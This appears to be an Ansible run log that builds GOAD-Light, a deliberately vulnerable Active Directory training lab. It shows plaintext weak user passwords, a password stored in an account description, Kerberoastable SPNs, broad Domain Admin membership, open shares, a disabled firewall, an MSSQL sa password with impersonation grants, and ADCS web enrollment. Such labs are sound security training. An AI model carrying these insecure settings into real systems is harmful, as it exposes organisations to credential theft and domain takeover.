 [started TASK: ad : Sync the contents of one directory to another - hack to get Requires -Module Ansible.ModuleUtils.Legacy loaded on dc01]
 [started TASK: ad : Sync the contents of one directory to another - hack to get Requires -Module Ansible.ModuleUtils.Legacy loaded on dc02]

TASK [ad : Sync the contents of one directory to another - hack to get Requires -Module Ansible.ModuleUtils.Legacy loaded] *********************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: ad : Create users on dc01]
 [started TASK: ad : Create users on dc02]

TASK [ad : Create users] ***********************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'tywin.lannister', 'value': {'firstname': 'Tywin', 'surname': 'Lanister', 'password': 'powerkingftw135', 'city': 'Casterly Rock', 'description': 'Tywin Lanister', 'groups': ['Lannister'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'arya.stark', 'value': {'firstname': 'Arya', 'surname': 'Stark', 'password': 'Needle', 'city': 'Winterfell', 'description': 'Arya Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'jaime.lannister', 'value': {'firstname': 'Jaime', 'surname': 'Lanister', 'password': 'cersei', 'city': "King's Landing", 'description': 'Jaime Lanister', 'groups': ['Lannister'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'eddard.stark', 'value': {'firstname': 'Eddard', 'surname': 'Stark', 'password': 'FightP3aceAndHonor!', 'city': "King's Landing", 'description': 'Eddard Stark', 'groups': ['Stark', 'Domain Admins'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'cersei.lannister', 'value': {'firstname': 'Cersei', 'surname': 'Lanister', 'password': 'il0vejaime', 'city': "King's Landing", 'description': 'Cersei Lanister', 'groups': ['Lannister', 'Baratheon', 'Domain Admins', 'Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'catelyn.stark', 'value': {'firstname': 'Catelyn', 'surname': 'Stark', 'password': 'robbsansabradonaryarickon', 'city': "King's Landing", 'description': 'Catelyn Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'tyron.lannister', 'value': {'firstname': 'Tyron', 'surname': 'Lanister', 'password': 'Alc00L&S3x', 'city': "King's Landing", 'description': 'Tyron Lanister', 'groups': ['Lannister'], 'path': 'OU=Westerlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'robb.stark', 'value': {'firstname': 'Robb', 'surname': 'Stark', 'password': 'sexywolfy', 'city': 'Winterfell', 'description': 'Robb Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'robert.baratheon', 'value': {'firstname': 'Robert', 'surname': 'Baratheon', 'password': 'iamthekingoftheworld', 'city': "King's Landing", 'description': 'Robert Lanister', 'groups': ['Baratheon', 'Domain Admins', 'Small Council', 'Protected Users'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'sansa.stark', 'value': {'firstname': 'Sansa', 'surname': 'Stark', 'password': '345ertdfg', 'city': 'Winterfell', 'description': 'Sansa Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/eyrie.north.sevenkingdoms.local']}})
changed: [dc01] => (item={'key': 'joffrey.baratheon', 'value': {'firstname': 'Joffrey', 'surname': 'Baratheon', 'password': '1killerlion', 'city': "King's Landing", 'description': 'Joffrey Baratheon', 'groups': ['Baratheon', 'Lannister'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'brandon.stark', 'value': {'firstname': 'Brandon', 'surname': 'Stark', 'password': 'iseedeadpeople', 'city': 'Winterfell', 'description': 'Brandon Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'renly.baratheon', 'value': {'firstname': 'Renly', 'surname': 'Baratheon', 'password': 'lorastyrell', 'city': "King's Landing", 'description': 'Renly Baratheon', 'groups': ['Baratheon', 'Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'rickon.stark', 'value': {'firstname': 'Rickon', 'surname': 'Stark', 'password': 'Winter2022', 'city': 'Winterfell', 'description': 'Rickon Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'stannis.baratheon', 'value': {'firstname': 'Stannis', 'surname': 'Baratheon', 'password': 'Drag0nst0ne', 'city': "King's Landing", 'description': 'Stannis Baratheon', 'groups': ['Baratheon', 'Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'hodor', 'value': {'firstname': 'hodor', 'surname': 'hodor', 'password': 'hodor', 'city': 'Winterfell', 'description': 'Brainless Giant', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'petyer.baelish', 'value': {'firstname': 'Petyer', 'surname': 'Baelish', 'password': '@littlefinger@', 'city': "King's Landing", 'description': 'Petyer Baelish', 'groups': ['Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'jon.snow', 'value': {'firstname': 'Jon', 'surname': 'Snow', 'password': 'iknownothing', 'city': 'Castel Black', 'description': 'Jon Snow', 'groups': ['Stark', 'Night Watch'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/thewall.north.sevenkingdoms.local']}})
changed: [dc01] => (item={'key': 'lord.varys', 'value': {'firstname': 'Lord', 'surname': 'Varys', 'password': '_W1sper_$', 'city': "King's Landing", 'description': 'Lord Varys', 'groups': ['Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'samwell.tarly', 'value': {'firstname': 'Samwell', 'surname': 'Tarly', 'password': 'Heartsbane', 'city': 'Castel Black', 'description': 'Samwell Tarly (Password : Heartsbane)', 'groups': ['Night Watch'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'maester.pycelle', 'value': {'firstname': 'Maester', 'surname': 'Pycelle', 'password': 'MaesterOfMaesters', 'city': "King's Landing", 'description': 'Maester Pycelle', 'groups': ['Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'jeor.mormont', 'value': {'firstname': 'Jeor', 'surname': 'Mormont', 'password': '_L0ngCl@w_', 'city': 'Castel Black', 'description': 'Jeor Mormont', 'groups': ['Night Watch', 'Mormont'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'sql_svc', 'value': {'firstname': 'sql', 'surname': 'service', 'password': 'YouWillNotKerboroast1ngMeeeeee', 'city': '-', 'description': 'sql service', 'groups': [], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['MSSQLSvc/castelblack.north.sevenkingdoms.local:1433', 'MSSQLSvc/castelblack.north.sevenkingdoms.local']}})
 [started TASK: ad : Set users SPN lists on dc01]
 [started TASK: ad : Set users SPN lists on dc02]

TASK [ad : Set users SPN lists] ****************************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'sansa.stark', 'value': {'firstname': 'Sansa', 'surname': 'Stark', 'password': '345ertdfg', 'city': 'Winterfell', 'description': 'Sansa Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/eyrie.north.sevenkingdoms.local']}})
changed: [dc02] => (item={'key': 'jon.snow', 'value': {'firstname': 'Jon', 'surname': 'Snow', 'password': 'iknownothing', 'city': 'Castel Black', 'description': 'Jon Snow', 'groups': ['Stark', 'Night Watch'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/thewall.north.sevenkingdoms.local']}})
changed: [dc02] => (item={'key': 'sql_svc', 'value': {'firstname': 'sql', 'surname': 'service', 'password': 'YouWillNotKerboroast1ngMeeeeee', 'city': '-', 'description': 'sql service', 'groups': [], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['MSSQLSvc/castelblack.north.sevenkingdoms.local:1433', 'MSSQLSvc/castelblack.north.sevenkingdoms.local']}})
 [started TASK: ad : Assign managed_by domainlocal groups on dc01]
 [started TASK: ad : Assign managed_by domainlocal groups on dc02]
 [started TASK: ad : Assign managed_by universal groups on dc01]
 [started TASK: ad : Assign managed_by universal groups on dc02]
 [started TASK: ad : Assign managed_by global groups on dc01]
 [started TASK: ad : Assign managed_by global groups on dc02]

TASK [ad : Assign managed_by global groups] ****************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'Stark', 'value': {'managed_by': 'eddard.stark', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Lannister', 'value': {'managed_by': 'tywin.lannister', 'path': 'OU=Westerlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Night Watch', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Baratheon', 'value': {'managed_by': 'robert.baratheon', 'path': 'OU=Stormlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Mormont', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
 [started TASK: ad : Add members to the Universal group, preserving existing membership on dc01]
 [started TASK: ad : Add members to the Universal group, preserving existing membership on dc02]
 [started TASK: ad : Add members to the Global group, preserving existing membership on dc01]
 [started TASK: ad : Add members to the Global group, preserving existing membership on dc02]
 [started TASK: ad : Add members to the Domainlocal group, preserving existing membership on dc01]
 [started TASK: ad : Add members to the Domainlocal group, preserving existing membership on dc02]

PLAY [Servers AD data configuration] ***********************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: settings/copy_files : Create directory on srv02]

TASK [settings/copy_files : Create directory] **************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: settings/copy_files : Download GOAD img in C:\tmp on srv02]

TASK [settings/copy_files : Download GOAD img in C:\tmp] ***************************************************************************************************************************************************
changed: [srv02]

PLAY [Move to OU] ******************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: move_to_ou : Move computer to OU on dc01]
 [started TASK: move_to_ou : Move computer to OU on dc02]

TASK [move_to_ou : Move computer to OU] ********************************************************************************************************************************************************************
ok: [dc02] => (item={'key': 'srv02', 'value': {'hostname': 'castelblack', 'type': 'server', 'local_admin_password': 'NgtI75cKV+Pu', 'domain': 'north.sevenkingdoms.local', 'path': 'DC=north,DC=sevenkingdoms,DC=local', 'use_laps': False, 'local_groups': {'Administrators': ['north\\jeor.mormont'], 'Remote Desktop Users': ['north\\Night Watch', 'north\\Mormont', 'north\\Stark']}, 'scripts': [], 'vulns': ['directory', 'disable_firewall', 'openshares', 'files', 'permissions'], 'vulns_vars': {'directory': {'shares': 'C:\\shares', 'all': 'C:\\shares\\all'}, 'files': {'website': {'src': 'srv02/wwwroot', 'dest': 'C:\\inetpub\\'}, 'letter_in_shares': {'src': 'srv02/all/arya.txt', 'dest': 'C:\\shares\\all\\arya.txt'}}, 'permissions': {'IIS_IUSRS_upload': {'path': 'C:\\inetpub\\wwwroot\\upload', 'user': 'IIS_IUSRS', 'rights': 'FullControl'}}}, 'mssql': {'sa_password': 'Sup1_sa_P@ssw0rd!', 'svcaccount': 'sql_svc', 'sysadmins': ['NORTH\\jon.snow'], 'executeaslogin': {'NORTH\\samwell.tarly': 'sa', 'NORTH\\brandon.stark': 'NORTH\\jon.snow'}, 'executeasuser': {'arya_master_dbo': {'user': 'NORTH\\arya.stark', 'db': 'master', 'impersonate': 'dbo'}, 'arya_dbms_dbo': {'user': 'NORTH\\arya.stark', 'db': 'msdb', 'impersonate': 'dbo'}}}}})

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=16   changed=6    unreachable=0    failed=0    skipped=9    rescued=0    ignored=0   
dc02                       : ok=12   changed=6    unreachable=0    failed=0    skipped=7    rescued=0    ignored=0   
srv02                      : ok=4    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-gmsa.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-gmsa.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [GMSA inside AD] **************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
ok: [dc01]
 [started TASK: gmsa : Create GMSA Account on dc01]
 [started TASK: gmsa : Create GMSA Account on dc02]

PLAY [GMSA hosts] ******************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: gmsa_hosts : Install-WindowsFeature RSAT-AD-PowerShell on srv02]
 [started TASK: gmsa_hosts : Install ADServiceAccount on srv02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=7    changed=0    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   
dc02                       : ok=2    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
srv02                      : ok=2    changed=0    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   

[*] Run playbook : laps.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini laps.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [configure laps on DCs] *******************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [configure laps on servers] ***************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [verify and show laps passwords] **********************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [set laps users and groups permission] ****************************************************************************************************************************************************************
skipping: no hosts matched

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=6    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-relations.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-relations.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Adjust rights configuration] *************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: settings/adjust_rights : Add domain users to local groups on dc01]
 [started TASK: settings/adjust_rights : Add domain users to local groups on dc02]
 [started TASK: settings/adjust_rights : Add domain users to local groups on srv02]

TASK [settings/adjust_rights : Add domain users to local groups] *******************************************************************************************************************************************
changed: [srv02] => (item={'key': 'Administrators', 'value': ['north\\jeor.mormont']})
changed: [dc02] => (item={'key': 'Administrators', 'value': ['north\\eddard.stark', 'north\\catelyn.stark', 'north\\robb.stark']})
changed: [dc01] => (item={'key': 'Administrators', 'value': ['sevenkingdoms\\robert.baratheon', 'sevenkingdoms\\cersei.lannister', 'sevenkingdoms\\DragonRider']})
changed: [srv02] => (item={'key': 'Remote Desktop Users', 'value': ['north\\Night Watch', 'north\\Mormont', 'north\\Stark']})
changed: [dc02] => (item={'key': 'Remote Desktop Users', 'value': ['north\\Stark']})
changed: [dc01] => (item={'key': 'Remote Desktop Users', 'value': ['sevenkingdoms\\Small Council', 'sevenkingdoms\\Baratheon']})
 [started TASK: settings/user_rights : Add remote desktop and administrators group to rdp on dc01]
 [started TASK: settings/user_rights : Add remote desktop and administrators group to rdp on dc02]
 [started TASK: settings/user_rights : Add remote desktop and administrators group to rdp on srv02]

TASK [settings/user_rights : Add remote desktop and administrators group to rdp] ***************************************************************************************************************************
ok: [srv02]
changed: [dc02]
changed: [dc01]

PLAY [cross domain groups] *********************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
ok: [dc01]
 [started TASK: groups_domains : Reboot and wait for the AD system to restart on dc01]
 [started TASK: groups_domains : Reboot and wait for the AD system to restart on dc02]

TASK [groups_domains : Reboot and wait for the AD system to restart] ***************************************************************************************************************************************
changed: [dc01]
changed: [dc02]
 [started TASK: groups_domains : synchronizes all domains on dc01]
 [started TASK: groups_domains : synchronizes all domains on dc02]

TASK [groups_domains : synchronizes all domains] ***********************************************************************************************************************************************************
changed: [dc02]
changed: [dc01]
 [started TASK: groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} on dc01]
 [started TASK: groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} on dc02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=12   changed=4    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   
dc02                       : ok=7    changed=4    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
srv02                      : ok=4    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : adcs.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini adcs.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [ADCS] ************************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: adcs : Install ADCS on dc01]

TASK [adcs : Install ADCS] *********************************************************************************************************************************************************************************
changed: [dc01]
 [started TASK: adcs : Install-WindowsFeature ADCS-Cert-Authority on dc01]

TASK [adcs : Install-WindowsFeature ADCS-Cert-Authority] ***************************************************************************************************************************************************
ok: [dc01]
 [started TASK: adcs : Install-WindowsFeature ADCS-Web-Enrollment on dc01]

TASK [adcs : Install-WindowsFeature ADCS-Web-Enrollment] ***************************************************************************************************************************************************
ok: [dc01]
 [started TASK: adcs : Install-ADCSCertificationAuthority-PS on dc01]

TASK [adcs : Install-ADCSCertificationAuthority-PS] ********************************************************************************************************************************************************
changed: [dc01]
 [started TASK: adcs : Enable Web enrollement on dc01]

TASK [adcs : Enable Web enrollement] ***********************************************************************************************************************************************************************
changed: [dc01]
 [started TASK: adcs : Refresh on dc01]

TASK [adcs : Refresh] **************************************************************************************************************************************************************************************
changed: [dc01]

PLAY [ADCS] ************************************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=13   changed=4    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-acl.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-acl.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
